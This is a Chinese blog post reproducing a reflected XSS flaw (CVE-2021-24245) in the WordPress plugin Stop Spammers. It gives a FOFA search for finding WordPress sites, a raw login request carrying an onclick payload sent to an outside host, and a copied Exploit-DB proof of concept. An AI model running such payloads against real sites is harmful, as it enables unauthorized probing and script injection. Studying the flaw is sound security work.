WordPress插件阻止垃圾邮件发送者2021.8-反映跨站点脚本(XSS)的“日志”

最新推荐文章于 2024-02-24 19:09:32 发布
最新推荐文章于 2024-02-24 19:09:32 发布
阅读量363 收藏
点赞数
分类专栏: 漏洞 文章标签: 渗透测试 安全漏洞 wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/117047584
版权

一.漏洞复现)

fofa搜索:"WordPress"

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

POST /wordpress/wp-login.php HTTP/1.1
Host: hgnw.dev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://hgnw.dev/wordpress/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Origin: https://hgnw.dev
Connection: close
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1

log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=Log+In&redirect_to=https%3A%2F%2Fhgnw.dev%2Fwordpress%2Fwp-admin%2F&testcookie=1

在这里插入图片描述

二.漏洞exploit)

 Exploit Database
EXPLOIT DATABASE
EXPLOITS

GHDB

PAPERS

SHELLCODES

SEARCH EDB

SEARCHSPLOIT MANUAL

SUBMISSIONS

ONLINE TRAINING


Exploit Database
WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
EDB-ID:
49880
CVE:
2021-24245

EDB Verified: 
Author:
HOSEIN VITA
Type:
WEBAPPS

Exploit:    /   
Platform:
PHP
Date:
2021-05-19

Vulnerable App:
 
# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
# Date: 04/08/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/
# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip
# Version: <= 2021.8
# Tested on: Windows-Ubuntu
# CVE : CVE-2021-24245

Summary:

Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript

Proof of concepts:

1-Install "Stop Spammers <= 2021.8" in your wordpress website
2-For testing remove your IP address from the allowed list
3-Go to http://<YOUR-WEBSITE>/wp-admin
4-In username field enter this payload ~> ad" accesskey=X οnclick=alert(1) "
#Notice the `ad` keyword must be in your payload!
5-Press Alt + Shift + X to trigger Xss
#Tested on Firefox

Request POC:

POST /wp-login.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 161
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_test_cookie=WP+Cookie+check;

log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1
GuiltyFet
关注
专栏目录
WordPress Wholesale Market 插件 任意文件读取漏洞复现
0xSec
03-20 477
WordPress plugin Wholesale Market 2.2.1之前版本存在路径遍历漏洞,该漏洞源于没有进行授权检查,也不会验证用户输入。攻击者利用该漏洞可以从服务器下载任意文件。
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
如何阻止WordPress引用垃圾邮件
09-12 340
wordpress邮件Are you struggling with WordPress trackback spam? WordPress trackback spam can become a serious problem for many site owners. In this article, we will show you how to put a stop WordPress t...
WordPress防止拦截垃圾邮件插件WordPress Zero Spam
boke112的博客
09-28 985
平时我们 WordPress 站长为了防止垃圾评论和垃圾邮件,通过添加验证码或者需要用户验证是否为机器人等措施来防护,但是这种做法不利于用户体验。其实,我们可以安装这款 WordPress Zero Spam 插件来防止拦截垃圾邮件,该插件将 AI 与成熟的垃圾邮件检测技术结合使用,并结合了来自世界各地的已知恶意 IP 数据库来检测和阻止有害访问者。此外,它与其他流行的插件集成以提供全方位的保护。只需安装,激活即可享受无垃圾邮件的网站! WordPress Zero Spam插件的安装及启用 登录 Wo
wordpress防止垃圾邮件方法
newmiracle学习天地
01-11 1465
wordpress防止垃圾邮件方法 安装NoSpamNX插件 然后设置Operating mode 为 Block (recommended) save查看原文:http://newmiracle.cn/?p=967
WordPress Simple File List路径遍历漏洞(CVE-2022-1119)
xiaobai_20190815的博客
05-17 1446
一、漏洞描述 WordPressWordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件WordPress plugin The Simple File List 3.2.7及其之前版本存在安全漏洞,该漏洞源于~/includes/ee-downloader.php 文件中的 eeFile 参数缺少控制和过滤。攻击者利用该漏洞可以
Apache HTTP 过滤器filter、开源WAF(ModSecurity)、Apache 模块开发
西京刀客
03-08 2490
在编写Apache模块时,需要具备C或C++编程经验和对Apache Web服务器的基本了解。另外,需要参考Apache的文档和API参考手册来编写代码和构建模块。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 988
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Flask备忘录
weixin_51334923的博客
11-02 1771
此文仅仅作为学习本人Flask途中的学习笔记以及备忘录!!!!! 代码格式粘贴复制可能格式出错emm,自己知道就好了!! 无图,慢慢看!!挺枯燥的学习笔记,做个网络备份!!! 目录 一.服务架构: 二.Flask是什么? 01. 微框架 02. 特点 03. 组成 04.常用库: 三.Flask环境搭建: 01.Windows虚拟环境直接上: 02.Conda环境: 03.Linux环境: 四.Flask工程实践: 01.万物之源Hello World: 02.请求处理:
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
杨秀璋的专栏
10-30 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Powershell基础入门知识,涉及条件语句、循环语句、数组、函数 、字符串操作、注册表访问等。这篇文章将分享Web渗透的第一步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集。
fofa指纹识别库(更新于2019)
11-19
fofa指纹识别库,更新于2019。 年长年少,开心就好;
WordPress爆炸性0day,直接RCE!附POC
最新发布
m0_52514790的博客
02-24 1436
2.漏洞路径为:/wp-json/bricks/v1/render_element,然后使用构造好的POC进行nonce的替换,直接进行命令执行,获取服务器敏感信息以及进行敏感操作。其中执行的命令可以根据自己的需要进行更改即可。1.首先访问存在WordPress Bricks Builder 插件的网站,然后右键查看网页源代码或者使用抓包工具抓取返回的数据包,直接搜索参数nonce,获取其参数值。
【终极FOFA组合语法指南】如何用FOFA打出组合拳搜索目标资产?
鹅子鱼的博客:很菜但是很好学的小菜鸟
04-20 6418
【终极FOFA组合语法指南】如何用FOFA更快、更准、更专地搜索目标资产?
使用Jmeter登录WordPress的问题(Cookie管理)
n8765的专栏
08-05 1418
1. 背景简介 最近在开始对Xen/KVM的嵌套虚拟化(nested virtualization)做一些性能测试并收集一些性能数据,以便证明各种特性(如virtual EPT、VMCS shadowing等)在嵌套虚拟化中带来的性能提高。其中,我们还考虑到当前Web应用服务器是使用虚拟化技术的一个重要方面,所以专门设计了对Web应用的性能测试。对于我们俩这样做虚拟化团队来说,平时是没有什么特别
python 破解wp博客后台登陆密码
rocky的专栏
05-24 2325
当时自己架设wp的时候发现默认居然没有验证码,于是写了个小脚本,跑了下。 居然还拿到不少后台。 惊 代码:python 暴力破解wordpress博客后台登陆密码 (上面只是截取了一个本地的)
Fofa搜索技巧
qq_50854662的博客
10-10 1万+
Fofa搜索技巧(理论加实践的整理) 题记         最近在整理以前的知识,不过最近出现职业病了,打开fofa站点就停不下来。我把常用的fofa查询语句记录下来,方便查阅。钟馗之眼和他有区别也异曲同工。         https://fofa.so/         http://zoomeye.org        &
Fofa的简单使用
汗的博客
05-25 1万+
因为没氪金,没法深入研究,,, 文章目录地址简介查询语法参考基本语法逻辑运算符其他 地址 https://www.fofa.so/ 简介 官网这样描述:FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。 简单理解就是,一个本土加强版shodan,知道某产品在互联网的部署情况、获取一个根域名所有子域名网站、根据IP确认企业、根据一个子域名网站找到跟他在一个IP的其他网站、全网漏洞扫描、一个新的漏洞
FOFA网络空间搜索引擎使用教程
weixin_30883777的博客
08-09 1万+
FOFA是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配,例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。 官网:https://fofa.so/ 官方文档:https://fofa.so/help 下面是FOFA的一些简单使用案例: 注意:FOFA搜索关键词不区分大小写 1、搜索页面标题中含有“后台管理”关键词的网站...
[工具使用]黑暗引擎FOFA
热门推荐
网络安全知识分享
08-29 3万+
黑暗引擎FOFAFOFA(点我进入)逻辑运算符搜索子域名domain搜索指定内容的host全部域名bodycert搜索选定应用的网站搜索指定开放端口的IP搜索指定协议的IP搜索IP或者网段的信息搜索指定CSS/JS网站常用的一些内容其他 FOFA(点我进入) 官网这样描述:FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。 简单理解就是,一个本土加强版shodan,知道某产品在互联网的部署情况、
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值